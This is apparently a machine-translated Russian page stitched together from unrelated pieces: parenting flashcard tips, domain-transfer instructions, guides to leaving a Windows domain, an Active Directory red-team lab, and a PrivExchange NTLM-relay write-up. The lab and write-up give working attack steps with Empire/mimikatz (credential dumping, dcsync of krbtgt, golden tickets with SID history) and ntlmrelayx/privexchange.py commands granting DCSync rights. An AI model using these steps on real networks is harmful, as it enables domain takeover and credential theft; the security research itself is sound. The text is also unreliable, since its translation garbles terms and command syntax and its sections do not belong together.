2. Как развить интеллект? Я вам расскажу как. Ребенку быстро демонстрируются карточки с изображениями. При этом родителям необходимо проговаривать факт об объекте. Первые дни желательно включать 3 сеанса по 10 карточек. Затем количество карточек увеличивается.


3. Как научить ребенка считать? Легко! Для обучения счета до 20 ребенку быстро показывают карточки с красными точками по количеству изучаемых цифр.

Советы и рекомендации


Первое. Первое занятие – самое главное. Именно на этом этапе важно вызвать доверие ребёнка, заинтересовать его. Поэтому выберите наиболее подходящий момент для занятия и начинайте! Карточки первой серии нужно демонстрировать, сопровождая комментариями.


Второе. Обучение должен вызывать у ребёнка интерес, мотивировать его. Это легко понять, наблюдая за поведением дошкольника. Если он активно включается в предлагаемую игру, если всё происходящее вызывает у него азарт и желание получать новую информацию – вы на верном пути.


Третье. По мере обучения и развития малыша занятия можно немного видоизменять. Например, после показа карточки со словом или изображением предложите ребёнку найти предмет..


Четвертое. Некоторые родители прикрепляют карточки со словами и изображениями возле кроватки малыша. Это имеет смысл, однако не нужно забывать, что для ребёнка куда интереснее познавать новое вместе с близкими людьми. Поэтому не ленитесь участвовать в занятиях. Малышу также важна ваша реакция на сам процесс. Если вы улыбаетесь, хвалите его, он быстро сообразит, как вас можно порадовать и удивить.


Пятое. После того, как ребёнку исполнится 9-12 месяцев, занятия можно проводить следующим образом: мама называет слово или демонстрирует картинку с написанным словом, а малыш должен среди нескольких карточек отыскать правильное изображение. Можно также показать ребёнку картинку с написанным словом (к примеру, «глаза») и попросить его показать эту часть тела.


Шестое. Показывая карточки, желательно заранее сгруппировать их по категориям. Демонстрировать можно в разной последовательности. Для вашего удобства целесообразно подписать карточки с обратной стороны, чтобы не заглядывать постоянно на картинки. Это может помешать ребёнку воспринимать информацию и отвлечь его от процесса.


Седьмое. Не нужно демонстрировать одни и те же карточки более 3 раз в день. Не бойтесь вводить новый материал, если не наблюдаете ожидаемую реакцию малыша. Возможно, новая серия картинок понравится ему больше!


И так. Статья подошла к концу. Важно помнить одно: «В развитии малыша необходимо участвовать не только ребенку, но и родителю. Хотите вырастить «умницу» — потребуется много сил и времени». Удачи, дорогие мамы!.

Перенос домена

: как передать свой домен другой компании

Перенос домена

Если вы хотите передать свой домен другому регистратору, для завершения процесса должны быть выполнены все следующие требования.

Все заявки на передачу должны отображаться зеленым цветом.

Важно: Если срок действия вашего домена истек или истекает в течение следующих 10 дней, свяжитесь с нами для получения помощи.Попытка переноса домена с истекшим или истекающим сроком действия иногда может вызвать неожиданные осложнения, и мы хотим, чтобы перенос вашего домена происходил плавно.

Чрезвычайно важно, чтобы вы подтвердили адрес электронной почты администратора домена, прежде чем продолжить.
Вы должны иметь возможность получить код авторизации для переноса домена. Вы будете использовать этот код для подтверждения владения новым регистратором.
Контактная информация вашего домена находится слева.

Для успешной передачи у вас обязательно должен быть доступ к административному адресу электронной почты.

Как передать свой домен другому регистратору

  1. Войдите в свою панель управления доменом.
  2. Войдите в свою учетную запись и нажмите «Управление» на домене, который вы хотите перенести.
  3. В режиме просмотра карточек нажмите кнопку «Управление».
  4. В режиме просмотра списка щелкните значок шестеренки.
  5. Щелкните Transfers в левом меню.
  6. Убедитесь, что требования к передаче соблюдены, горит зеленым цветом.
  7. Примечание. Для людей с ослабленным зрением. Если вы видите это сообщение под кнопкой, все требования не выполнены.
  8. Нажмите кнопку Email Auth-Code, вы увидите краткое подтверждающее сообщение.
  9. После получения кода авторизации вы можете начать передачу своего домена новому регистратору. Вы можете ввести код авторизации в свою новую учетную запись вместе с ними или просто связаться с их специалистом службы поддержки.

Хотите перенести домен в?

Наш процесс переноса доменного имени в высокой степени автоматизирован и разработан таким образом, чтобы обеспечить максимально простой перенос доменного имени, не вызывая при этом простоя вашего веб-сайта. Перенесите свой домен прямо сейчас.

Pro Tip: Если вы оставите свой домен у нас, вы можете защитить свою личную информацию с помощью Domain Privacy + Protection. Это быстрый, простой и доступный способ удержать конкурентов, продавцов и воров от доступа к вашему домену и личной информации.

3 способа удалить компьютер с Windows 10 из домена

27 февраля, 2020 по Admin

Оставьте ответ »

Как удалить компьютер из домена, который больше не существует? Или выйти из домена и снова присоединиться к нему без сброса профиля пользователя? В этом руководстве мы покажем вам 3 метода удаления компьютера с Windows 10 из домена. Перед началом работы вам необходимо войти в Windows 10 с учетной записью локального администратора вместо учетной записи домена.Если вы не смогли вспомнить пароль, вам может помочь PCUnlocker.

Метод 1. Удаление компьютера с Windows 10 из домена с помощью свойств системы

  1. Нажмите клавиши Windows + R на клавиатуре, затем введите sysdm.cpl в поле «Выполнить» и нажмите Enter.

  2. Когда откроется окно «Свойства системы», нажмите кнопку « Изменить » в нижней части вкладки «Имя компьютера».

  3. Установите переключатель Workgroup , введите имя рабочей группы, членом которой вы хотите стать после выхода из домена.Щелкните ОК .

  4. При появлении запроса нажмите ОК .

    Вам будет предложено перезагрузить компьютер, чтобы изменения можно было применить.

Метод 2: удалить компьютер с Windows 10 из домена с помощью приложения настроек

  1. Откройте приложение «Настройки» и перейдите к Учетные записи -> Доступ к работе или учебе . На правой панели щелкните значок с надписью Подключен к домену AD (ваш домен), а затем щелкните Отключить .

  2. Щелкните Да для подтверждения.

  3. Когда появится запрос «Отключиться от организации», нажмите Отключить .

  4. После перезагрузки ваш компьютер с Windows 10 был отключен от домена Active Directory.

Метод 3. Удаление компьютера с Windows 10 из домена с помощью PowerShell

  1. Откройте Windows PowerShell с правами администратора, введите следующую команду, чтобы выйти из домена.
    Remove-Computer -UnjoinDomaincredential Domain_Name \ Administrator -PassThru -Verbose -Restart -Force

    При появлении запроса введите пароль администратора домена и нажмите ОК .

  2. Вы увидите предупреждение: После того, как вы покинете домен, вам нужно будет знать пароль учетной записи локального администратора для входа на этот компьютер . Введите Y , чтобы продолжить.

  3. Перезагрузите компьютер, чтобы завершить операцию отключения.

От администратора домена к администратору предприятия

Эта лабораторная работа основана на тематическом исследовании Empire, и ее цель — более подробно ознакомиться с некоторыми концепциями Powershell Empire и ее модулями, а также с концепциями Active Directory, такими как Forests, Parent / Child домены и доверительные отношения, и как ими можно злоупотреблять для повышения привилегий.

Конечная цель этой лабораторной работы — повышение привилегий от DA в дочернем домене до EA в корневом домене.

Во-первых, настройка LAB — нам нужно создать дочерний контроллер домена, а также новый лес с новым контроллером домена.

После установки дочернего домена red.offense.local родительского домена offense.local , Active Directory Domains and Trusts показывают родительско-дочерние отношения между доменами, а также их доверительные отношения по умолчанию:

Доверительные отношения между два домена могут быть проверены с помощью PowerShell, введя:

Первая консоль показывает доверительные отношения домена от нарушения . местная перспектива и вторая из red.offense.local . Обратите внимание на направление BiDirectional , что означает, что участники могут проходить аутентификацию из одного домена в другой, когда они хотят получить доступ к общим ресурсам:

Аналогичную, но очень упрощенную информацию можно получить из собственного двоичного файла Windows:

Способ проверки Powershell доверительные отношения:

 

([System.DirectoryServices.ActiveDirectory.Domain] :: GetCurrentDomain ()).GetAllTrustRelationships ()

После установки нового DC dc-blue в новом лесу давайте настроим одностороннее доверие между доменами offense.local и defense.local с помощью контроллеров dc-mantvydas.offense. местные и dc-blue.defense.blue .

Во-первых, настройка условных серверов пересылки DNS на обоих контроллерах домена:

Добавление нового доверия, сделав dc-mantvydas доверенным доменом:

Установка типа доверия на Forest :

Входящее доверие для dc- мантвидас.offense.local создан:

Тестирование вывода nltest:

Теперь, когда доверительные отношения установлены, легко проверить, правильно ли они были выполнены. Теперь должно произойти то, что ресурсы на Defense.local (доверенный домен) должны быть доступны членам offense.local (доверенный домен).

Обратите внимание, что пользователь на dc-mantvydas.offense.local не может предоставить общий доступ к папке для defense \ administrator (потому что offense.local не доверяет defense.local ):

Однако dc-blue.defense.local доверяет offense.local , следовательно, может поделиться ресурсом с одним из участников offense.local — доверительные отношения леса работают должным образом :

Предположим, мы получили наш первый агент обратно с компьютера PC-MANTVYDAS $ :

Поскольку агент работает с высокой степенью целостности, давайте сделаем дамп учетных данных — некоторые интересные учетные данные можно увидеть для пользователя в красном цвете . .offense.local domain:

Перечислив процессы с ps , мы можем увидеть ряд процессов, запущенных под учетной записью red \ spotless . Вот один из них:

Пользователь домена представляет интерес, поэтому мы будем использовать команду usemodule situational_awareness / network / powerview / get_user , чтобы перечислить красного \ безупречного пользователя и посмотреть, является ли он членом каких-либо интересных групп, однако мой Экземпляр empire, похоже, не вернул никаких результатов для этой команды. Для этой лабораторной работы предположим, что она показала, что пользователь red \ spotless является членом группы Administrators на red.offense.local домен.

Давайте украдем токен процесса с PID 4900, который работает с учетными данными red \ spotless :

После принятия привилегий члена red \ spotless, давайте получим имя компьютера контроллера домена для этого пользователя. Опять же, мой экземпляр Empire содержит ошибки, поэтому я использовал специальную команду, чтобы получить его:

 

shell [DirectoryServices.ActiveDirectory.Domain] :: GetCurrentDomain (). DomainControllers | ForEach-Object {$ _. Name}

Проверьте, есть ли у нас доступ администратора к каталогу оболочки DC-RED :

 

\\ dc-red.red.offense.local \ c $

Нам повезло, пользователь является администратором домена, как видно на скриншоте выше.

Давайте возьмем агента из DC-RED — обратите внимание, что учетные данные поступают из предыдущего дампа с mimikatz:

 

usemodule lateral_movement / invoke_wmi

Теперь агент вернулся, давайте просто подтвердим это:

Проверка доверительных отношений

В DC-RED давайте проверим любые доверительные отношения домена:

 

usemodule situational_awareness / network / powerview / get_domain_trust

Мы видим, что красный. offense.local является дочерним доменом домена offense.local , который автоматически является доверенным и доверенным (двустороннее доверие / двунаправленное) с offense.local — читайте дальше.

Теперь мы попытаемся перейти от DA в red.offense.local к EA в offense.local . Нам нужно создать золотой билет для red.offense.local и подделать его, чтобы мы стали экспертом в offense.local .

Во-первых, получение SID учетной записи пользователя krbtgt в преступлении .local :

 

(Empire: powershell / situational_awareness / network / powerview / get_domain_trust)> usemodule powershell / management / user_to_sid

(Empire: powershell / management / user_to_sid)> set Domain offense.local

(Empire: powershell management / user_to_sid)> установить пользователя krbtgt

(Empire: powershell / management / user_to_sid)> запустить

После получения SID offense.local \ krbtgt , нам нужно получить хэш пароля krbtgt аккаунт в скомпрометированном DC DC-RED (мы можем извлечь его, так как мы являемся администратором домена в red. offense.local ):

 

(Empire: powershell / management / user_to_sid)> usemodule powershell / credentials / mimikatz / dcsync

(Empire: powershell / credentials / mimikatz / dcsync)> установить пользователя red \ krbtgt

(Empire) : powershell / credentials / mimikatz / dcsync)> выполнить

Золотой билет для корневого домена

Теперь мы можем создать золотой билет для offense.local \ Domain Admins , поскольку у нас есть SID offense.local \ krbtgt и хеш красный.office sids S-1-5-21-4172452648-1021989953-2368502130-519

(Empire: powershell / credentials / mimikatz / golden_ticket)> установить CredID 8

(Empire: powershell / credentials / mimikatz / golden_ticket)> запустить

Обратите внимание, как в спецификации sids мы заменили последние три цифры с 502 (krbtgt) на 519 (администраторы предприятия) - эта часть процесса называется исторической атакой SID:

 

set sids S-1-5- 21-4172452648-1021989953-2368502130-519

Свойство CredID в модуле dcsync взято из хранилища учетных данных Empire, которое ранее было заполнено нашим mimikatz'ing:

Теперь мы должны быть администратором предприятия в преступлении .local , и мы можем протестировать его, указав долю администратора c $ из dc-mantvydas. offense.local:

 

shell dir \\ dc-mantvydas \ c $

Ради удовольствия и завершая эту лабораторную работу, давайте возьмем агента из dc-mantvydas :

Как перенести мой домен с Domain.com на ETNHost?

Как перенести мой домен из домена.com на ETNHost?

Здесь, в ETNHost, мы рекомендуем вам сохранить свое доменное имя там, где вы размещаете свой веб-сайт. Им легче управлять, меньше паролей, о которых нужно беспокоиться, лучшая безопасность и, наконец, что не менее важно, так вы получаете спокойствие. Вы будете получать регулярные уведомления от нас по электронной почте с напоминанием о сроке продления вашего доменного имени, поэтому вы не пропустите его и не рискуете стать недоступным для доступа к вашему веб-сайту.

Экстра:

Как только доменное имя будет передано нам, вы получите один год бесплатного продления доменного имени в качестве бонуса.

Передача доменных имен может занять от 3 до 10 дней до завершения. Прежде чем инициировать перенос доменного имени для доменного имени, зарегистрированного на Domain.com, вам необходимо убедиться, что выполняются следующие условия:

  • Домен должен быть старше 60 дней . Это не конкретное правило ETNHost или Domain.com, а скорее правило, внедренное ICANN, организацией, которая управляет регистрацией доменов.
  • Домен был разблокирован для переноса из Домена.com.
  • Домен , показывающий ваш текущий адрес электронной почты для контакта администратора в базе данных Whois, поскольку именно на него будет отправлено письмо для авторизации. Вы можете найти действующий административный адрес электронной почты для своего доменного имени с помощью инструмента поиска WHOIS, доступного по адресу: http://whois.domaintools.com/
  • Срок действия домена не должен быть слишком близок к истечению срока его действия, так как Domain.com обычно автоматически продлевает домены за 15 дней до истечения срока действия .

Примечания:

60-дневный период удержания применяется только к передаче доменов между поставщиками регистраторов, когда домен либо недавно зарегистрирован, либо недавно перенесен.Если вы только что завершили обслуживание сайта у другого провайдера (без передачи домена другому регистратору), то 60-дневное удержание не должно применяться вообще. Если удержание действительно применяется, оно все равно не должно препятствовать тому, чтобы вы указали его на другую службу хоста для запуска нового сайта.

Чтобы подготовить ваше доменное имя к переносу с Domain.com, вы должны выполнить следующие шаги:

  1. Войдите в свою панель управления Domain.com
  2. Разблокировать доменное имя
  • Чтобы успешно разблокировать свое доменное имя, перейдите на Domain Central .
  • Выберите доменное имя, которое хотите разблокировать.
  • Щелкните Security .
  • Чтобы разблокировать доменное имя, нажмите кнопку Разблокировать домен , которую можно найти в разделе Блокировка домена .
  1. Отключить функцию конфиденциальности / защиты идентификатора домена
  • Чтобы отключить конфиденциальность домена, который вы хотите передать, перейдите на Domain Central .
  • Выберите доменное имя, для которого вы хотите отключить конфиденциальность.
  • Щелкните Безопасность.
  • Чтобы отключить конфиденциальность домена, нажмите кнопку Отключить конфиденциальность домена , которую можно найти в разделе «Конфиденциальность домена».
  1. При необходимости обновите контактную информацию домена (информация Whois)
  • Чтобы внести изменения в контактную информацию доменного имени, которое вы хотите передать, перейдите на Domain Central .
  • Выберите доменное имя, которое вы хотите изменить, и щелкните по нему.
  • Щелкните Контакт и обновите информацию в соответствующих полях.
  • Используйте раскрывающийся список «Контактная информация», чтобы выбрать контактную информацию, которую вы хотите просмотреть / изменить.
  • Используйте флажки «Копировать в», чтобы сохранить изменения сразу для нескольких контактов.
  • Используйте текстовые поля для изменения контактной информации. Некоторые текстовых полей являются выпадающими.
  • После того, как вы закончите, нажмите кнопку Сохранить .
  1. Получите EPP / код авторизации
  • Чтобы получить назначенный код EPP для доменного имени, которое вы хотите перенести, просто перейдите в Domain Central и выберите доменное имя.
  • Щелкните Передача .
  • Найдите и нажмите кнопку Отправить код аутентификации .
  • Код будет отправлен на адрес электронной почты, который вы указали на вкладке «Контакты».

После завершения подготовки подождите некоторое время (день или около того), прежде чем инициировать перенос.Вы также можете проверить информацию Whois для своего домена. Вы можете сделать это на http://www.whois.net или http://whois.domaintools.com или на подобных сайтах, чтобы убедиться, что все отображается и правильно.

Когда все будет готово, вы можете отправить запрос на перенос домена:

  • Начните в своей учетной записи ETNHost.
  • Продолжите размещение заказа на перенос доменного имени, щелкнув вкладку Домены .
  • При запросе на перенос доменного имени вам нужно будет ввести код авторизации / EPP .После ввода кода процесс начнется.

Обратите внимание, что вы также получите электронное письмо с подтверждением переноса на адрес указанного административного контакта для домена. После подтверждения передачи у проигравшего регистратора (Domain.com) есть 7 дней на освобождение домена. Если все в порядке, домен будет освобожден и добавлен в раздел доменов в вашей учетной записи ETNHost.

Примечания:

Как только вы начнете перенос доменного имени, вы должны помнить, что вы не можете изменить свой DNS, информацию Whois, контактную информацию и так далее.

Будь умнее!

Готовы использовать то, что вы узнали? Потрясающий. Наслаждайтесь увеличенной мощностью, гибкостью и контролем для ваших веб-сайтов вместе с нами. Начать сейчас

Пожалуйста, включите JavaScript, чтобы просматривать комментарии от Disqus.

Перенос из реестра доменов Америки

Чтобы перенести доменное имя, зарегистрированное в «Реестре доменов Америки», вам необходимо убедиться, что оно разблокировано, что адрес «административного контакта WHOIS» указан правильно и вам известен «код авторизации переноса» («код EPP»). .

Разблокировать доменное имя

  1. Перейти на https://www.droa.com/
  2. Щелкните Управление доменом слева
  3. Войдите, используя ваше доменное имя и пароль
  4. Нажмите Разблокировать домен
  5. На следующей странице должно быть указано, что Состояние блокировки вашего регистратора - ЗАБЛОКИРОВАНО ; нажмите Нажмите здесь, чтобы разблокировать кнопку
  6. Вы получите еще одну страницу подтверждения; нажмите Нажмите здесь, чтобы продолжить разблокировку кнопку
  7. На следующей странице должно появиться подтверждение, что Состояние блокировки вашего регистратора - НЕ ЗАБЛОКИРОВАНО

Подтвердите административный контактный адрес электронной почты WHOIS

Прежде всего, используйте эту страницу поиска WHOIS, чтобы убедиться, что Реестр доменов Америки указывает ваш адрес электронной почты в качестве «административного контакта». Вы не можете передать свое доменное имя, если не указан ваш адрес электронной почты (по соображениям безопасности адрес электронной почты WHOIS получает сообщение с инструкциями, объясняющими, как одобрить перенос).

Если на странице WHOIS указан адрес «[email protected]» или «[email protected]» либо адрес устарел, выполните следующие действия, чтобы исправить это:

  1. Если вы еще не вошли в их панель управления:
    1. Перейти на https://www.droa.com/
    2. Щелкните Управление доменом слева
    3. Войдите, используя ваше доменное имя и пароль
  2. Нажмите Контактная информация
  3. Посмотрите внимательно, чтобы найти, где начинается раздел Административный контакт (он может начинаться с желтого рисунка)
  4. Щелкните Используйте следующую информацию
  5. Убедитесь, что ваш адрес электронной почты введен в поле Адрес электронной почты поле
  6. Вы также можете редактировать другие значения в разделе Административное контактное лицо , но на данный момент действительно имеет значение только адрес электронной почты.
  7. Не нужно ли , а не изменять поля для контакта с регистрантом ; это может помешать вашему переводу работать
  8. Нажмите Изменить внизу страницы, чтобы сохранить изменения

После того, как вы сохранили какие-либо изменения, подождите несколько минут, а затем снова проверьте страницу WHOIS, чтобы убедиться, что ваши изменения были приняты.

Знайте свой код авторизации перевода («Код EPP»)

Наконец, Реестр доменов Америки должен предоставить вам «код авторизации передачи», который вы будете вводить на наших веб-страницах. (Они также могут называть его «кодом EPP».) Он должен быть доступен на экране их панели управления; в противном случае вам нужно будет связаться с ними и попросить у них код. (Щелкните Свяжитесь с нами на панели навигации.)

Как удалить домен с компьютера | Small Business

Стивен Мелендез Обновлено 16 января 2019 г.

В терминологии Microsoft Windows домен - это группа сетевых компьютеров и ресурсов, управляемых сервером Active Directory.Компании обычно используют домены Active Directory для управления логинами и доступом к общим ресурсам, таким как серверы и сетевые принтеры, на нескольких компьютерах. Если вы приобретаете новый компьютер для своего бизнеса, вам может потребоваться подключить его к существующей настройке Active Directory и соответствующему локальному домену.

Иногда может потребоваться отключить компьютер от домена и заставить его работать независимо.

Общие сведения об Active Directory и доменах

Термин домен может иметь несколько контекстов в информатике и сетях.Возможно, вы слышали о доменном имени, например example.com, что означает удобочитаемое имя компьютера в Интернете или другой сети. Серверы в домене example.com, такие как www.example.com или mail.example.com, назначаются всем этим адресам сервером доменных имен, который может разрешать или запрещать компьютерам входить в состав домена.

Точно так же в средстве управления сетью Microsoft под названием Active Directory некоторые компьютеры считаются принадлежащими определенному домену.Каждый домен имеет централизованный набор имен пользователей, паролей, данных конфигурации и разрешений учетной записи, который управляется через сервер, называемый контроллером домена Active Directory. Компьютеры в одном домене не обязательно должны находиться в одной комнате или даже в одном месте. У некоторых предприятий есть домены Active Directory, которые охватывают несколько офисов.

Когда компьютер является частью домена Active Directory, вы обычно входите в систему с учетными данными, назначенными контроллером домена и тем, кто им управляет, а не с вашими локальными учетными записями. Возможно, вы захотите удалить компьютер из домена в какой-то момент, если он будет использоваться независимо, или, естественно, добавить новые устройства в домен по мере того, как ваш бизнес расширяет свой компьютерный инвентарь.

Как покинуть домен

Если ваш компьютер является членом домена Active Directory, вы можете отключить его от домена и сделать его частью локальной рабочей группы, более простой альтернативы домену, который может даже включать только ваш один компьютер.

Сначала войдите в систему с учетной записью администратора.Если у вас нет необходимых учетных данных, обратитесь за помощью в свой ИТ-отдел (или к тому, кто настраивал вашу сеть). После входа в систему удерживайте клавишу Windows на клавиатуре и нажмите X, чтобы открыть меню «Инструменты» Windows. Щелкните «Система» в меню.

В меню «Система» нажмите «Изменить настройки». На вкладке «Имя компьютера» нажмите «Изменить». Выберите «Рабочая группа» вместо «Домен» и введите имя новой или существующей рабочей группы. Нажмите «ОК» и перезагрузите компьютер, чтобы изменения вступили в силу.

Вы также можете использовать этот же экран конфигурации для присоединения компьютера к домену. Возможно, вам придется работать с тем, кто управляет вашим контроллером домена, чтобы получить необходимые разрешения и учетные записи, настроенные для подключения вашего компьютера к новому домену и входа в систему с вашей учетной записью.

Использование PowerShell для выхода из доменов

Вы также можете покинуть домен Windows с помощью PowerShell , бесплатного инструмента создания сценариев от Microsoft. Это может быть полезно, если вы хотите автоматизировать вход в домены и выход из них.

Используйте команду Remove-Computer в PowerShell, чтобы удалить компьютер из домена. Вы можете указать множество параметров, включая имя рабочей группы, в которую будет перемещен компьютер, и вы должны указать имя пользователя, которому разрешено удалить компьютер из домена, используя параметр «UnjoinDomaincredential». По умолчанию компьютер будет присоединен к рабочей группе, называемой просто «WORKGROUP». Вам может быть предложено ввести пароль авторизованного пользователя.

Возможно, вам потребуется перезагрузить компьютер, чтобы изменения вступили в силу.Если вы хотите сделать это как часть команды PowerShell, используйте параметр «-Restart».

Используйте команду PowerShell Add-Computer, чтобы добавить компьютер в новый домен.

Злоупотребление Exchange: один вызов API от администратора домена

В большинстве организаций, использующих Active Directory и Exchange, серверы Exchange имеют такие высокие привилегии, что быть администратором на сервере Exchange достаточно, чтобы перейти на уровень администратора домена. Недавно я наткнулся на блог ZDI, в котором подробно описан способ, позволяющий Exchange аутентифицировать злоумышленников с помощью NTLM через HTTP.Это можно комбинировать с атакой ретрансляции NTLM, чтобы перейти от любого пользователя с почтовым ящиком к администратору домена, вероятно, в 90% организаций, которые используют Exchange. Эта атака возможна по умолчанию , и, хотя на момент написания исправлений не было, есть меры по предотвращению этого повышения привилегий. В этом блоге подробно описывается атака, некоторые технические детали и способы ее устранения, а также выпущен инструмент для проверки концепции этой атаки, который я назвал «PrivExchange». Обновление : Доступны исправления для PrivExchange, см. Раздел «Выпущенные обновления».

Этот блог объединяет несколько известных уязвимостей и известных слабых мест протокола в новую атаку. Есть 3 компонента, которые объединены для перехода от любого пользователя с почтовым ящиком к доступу администратора домена:

  • Серверы Exchange по умолчанию имеют (слишком) высокие привилегии
  • NTLM-аутентификация уязвима для ретрансляционных атак
  • Exchange имеет функцию, которая позволяет аутентифицировать злоумышленника с учетной записью компьютера на сервере Exchange
  • .

Обмен и высокие привилегии

Основная уязвимость здесь заключается в том, что Exchange имеет высокие привилегии в домене Active Directory.Группа Exchange Windows Permissions имеет доступ WriteDacl к объекту домена в Active Directory, что позволяет любому члену этой группы изменять привилегии домена, в том числе право выполнять операции DCSync. Пользователи или компьютеры с этой привилегией могут выполнять операции синхронизации, которые обычно используются контроллерами домена для репликации, что позволяет злоумышленникам синхронизировать все хешированные пароли пользователей в Active Directory. Об этом говорили несколько исследователей (см. Раздел ссылок в конце этого поста), и я писал об этом со своим коллегой по Fox-IT Риндертом в прошлом году.В этом посте я также выпустил обновление для ntlmrelayx, которое добавляет возможность выполнять эти атаки на основе списка контроля доступа (ACL) во время ретрансляции NTLM.

Счета ретрансляционной машины NTLM

Ретрансляция

NTLM существует уже давно. Раньше основное внимание уделялось ретрансляции аутентификации NTLM через SMB, чтобы обеспечить выполнение кода на других хостах. Хотя это, к сожалению, остается возможным во многих корпоративных сетях, которые не защищены от этого путем включения подписи SMB, другие протоколы также уязвимы для ретрансляции.На мой взгляд, наиболее интересным протоколом для этого является LDAP, который можно использовать для чтения и изменения объектов в каталоге (Active). Если вам нужно вспомнить о ретрансляции NTLM, вы можете прочитать об этом в блоге, который я написал недавно. Краткая версия заключается в том, что, если не применяются меры по снижению рисков, можно пройти аутентификацию, которая выполняется (автоматически) Windows, когда она подключается к машине злоумышленника к другим машинам в сети, как показано на изображении ниже:

Когда аутентификация передается в LDAP, объекты в каталоге могут быть изменены, чтобы предоставить злоумышленнику привилегии, включая привилегии, необходимые для операций DCSync. Таким образом, если мы можем заставить сервер Exchange аутентифицироваться для нас с аутентификацией NTLM, мы можем выполнить атаку ACL. Следует отметить, что ретрансляция в LDAP работает только в том случае, если жертва аутентифицируется для нас через HTTP, а не через SMB (см. Раздел «Технические детали» для объяснения).

Получение Exchange для аутентификации

Единственный компонент, который отсутствовал до сих пор, - это простой способ заставить Exchange аутентифицироваться для нас. Исследователь ZDI (имя которого в статье остается неназванным) обнаружил, что можно заставить Exchange аутентифицироваться по произвольному URL-адресу через HTTP с помощью функции Exchange PushSubscription .В своем сообщении в блоге они использовали эту уязвимость, чтобы ретранслировать аутентификацию NTLM обратно в Exchange (это называется атакой отражения) и выдавать себя за других пользователей. Если вместо этого мы объединим это с высокими привилегиями, которые Exchange имеет по умолчанию, и выполним ретрансляционную атаку вместо атаки отражения, мы сможем использовать эти привилегии, чтобы предоставить себе права DCSync. Служба push-уведомлений имеет возможность отправлять сообщение каждые X минут (где X может быть указан злоумышленником), даже если никаких событий не произошло.Это то, что гарантирует, что Exchange будет подключаться к нам, даже если в почтовом ящике нет активности.

Схема вышеупомянутой атаки показана ниже, показывая шаги, которые выполняются для повышения привилегий:

Нам нужны два инструмента для выполнения атаки: privexchange.py и ntlmrelayx . Вы можете получить и то, и другое на GitHub в репозиториях PrivExchange и impacket.
Запустите ntlmrelayx в режиме ретрансляции с LDAP на контроллере домена в качестве цели и предоставьте пользователю под контролем злоумышленников для повышения привилегий (в данном случае пользователь ntu ):

  ntlmrelayx. py -t ldap: //s2016dc.testsegment.local --escalate-user ntu
  

Теперь запускаем скрипт privexchange.py :

  пользователь @ localhost: ~ / exchpoc $ python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u ntu -d testsegment.local
Пароль:
ИНФОРМАЦИЯ: Использование URL злоумышленника: http: //dev.testsegment.local/privexchange/
ИНФОРМАЦИЯ: Exchange возвратил HTTP-статус 200 - аутентификация прошла успешно
ОШИБКА. Пользователь, с которым вы прошли аутентификацию, не имеет связанного почтового ящика.Попробуйте другого пользователя.
  

Когда это выполняется с пользователем, у которого нет почтового ящика, мы получим указанную выше ошибку.
Давайте попробуем еще раз с пользователем, у которого есть связанный почтовый ящик:

  пользователь @ localhost: ~ / exchpoc $ python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local
Пароль:
ИНФОРМАЦИЯ: Использование URL злоумышленника: http: //dev.testsegment.local/privexchange/
ИНФОРМАЦИЯ: Exchange возвратил HTTP-статус 200 - аутентификация прошла успешно
ИНФОРМАЦИЯ: вызов API был успешным
  

Через минуту (значение, указанное для push-уведомления) мы видим, что соединение входит в ntlmrelayx, что дает нашему пользователю привилегии DCSync:

Мы подтверждаем наличие прав DCSync с помощью secretsdump:

Используя хешированные пароли всех пользователей Active Directory, злоумышленник может создать золотые билеты для олицетворения любого пользователя или использовать хэш пароля любого пользователя для аутентификации в любой службе, принимающей NTLM или Kerberos аутентификацию в домене.

Ранее я упоминал, что ретрансляция из SMB в LDAP не работает, поэтому эту атаку нельзя выполнить, например, с использованием недавно выпущенного злоупотребления SpoolService RPC (поскольку аутентификация выполняется через SMB). Поскольку вопросы по этому поводу постоянно возникают и возникает много путаницы, давайте посмотрим, почему это так. Если вы не хотите глубоко разбираться в аутентификации NTLM, можете пропустить этот раздел :).

Разница между аутентификацией NTLM в SMB и HTTP заключается в флагах, которые согласовываются по умолчанию.Проблемной частью является флаг NTLMSSP_NEGOTIATE_SIGN ( 0x00000010 ), описанный в разделе 2.2.2.5 MS-NLMP. Аутентификация NTLM через HTTP не устанавливает этот флаг по умолчанию, но если он используется через SMB, этот флаг будет установлен по умолчанию:

Когда мы передаем это в LDAP, аутентификация будет успешной, но LDAP будет ожидать, что все сообщения будут подписаны сеансовым ключом, полученным из пароля (которого у нас нет при ретрансляционной атаке). Таким образом, он будет игнорировать любые сообщения без подписи, что приведет к сбою нашей атаки.Можно задаться вопросом, можно ли изменить эти флаги при передаче, чтобы подписание не согласовывалось. Это не будет работать в современных версиях Windows, поскольку они по умолчанию будут включать MIC (код целостности сообщения), который представляет собой подпись, основанную на всех трех сообщениях NTLM, поэтому любые изменения в любом из сообщений сделают его недействительным.

Можно снять микрофон? Что ж, да, мы можем, поскольку это не защищенная часть сообщения NTLM. Однако есть одна последняя защита в аутентификации NTLM (только NTLMv2), которая предотвращает это: глубоко внутри ответа NTLMv2, который сам по себе подписан паролем жертвы, существует структура AV_PAIR , которая называется MsvAvFlags .Когда это поле имеет значение 0x0002 , это указывает, что клиент отправил MIC вместе с сообщением типа 3.

Изменение ответа NTLMv2 сделает аутентификацию недействительной, поэтому мы не сможем удалить это поле флагов. Поле флага указывает, что MIC был рассчитан и включен, что заставит целевой сервер проверить MIC, который, в свою очередь, подтвердит, что все 3 сообщения не были изменены при передаче, и, таким образом, мы не можем удалить флаг подписи.

Это верно (я думаю) только для реализации NTLM от Microsoft.Пользовательские устройства, реализующие NTLM, скорее всего, не опустятся до уровня добавления флагов MIC и AV_PAIR , что делает их уязвимыми для модификации флагов и, таким образом, делает возможной ретрансляцию SMB-> LDAP. Примером этого является Java-реализация NTLM, которую можно модифицировать при передаче, чтобы обойти меры безопасности.

В предыдущем разделе мы использовали скомпрометированные учетные данные для выполнения первого шага атаки. Если злоумышленник может только выполнить сетевую атаку, но не имеет никаких учетных данных, все равно можно запустить Exchange для проверки подлинности.Если мы выполняем ретрансляционную атаку SMB на HTTP (или HTTP на HTTP) (используя спуфинг LLMNR / NBNS / mitm6), мы можем ретранслировать аутентификацию пользователя в том же сетевом сегменте в Exchange EWS и использовать их учетные данные для запуска обратного вызова (спасибо Марку за то, что он поднял этот вопрос!).
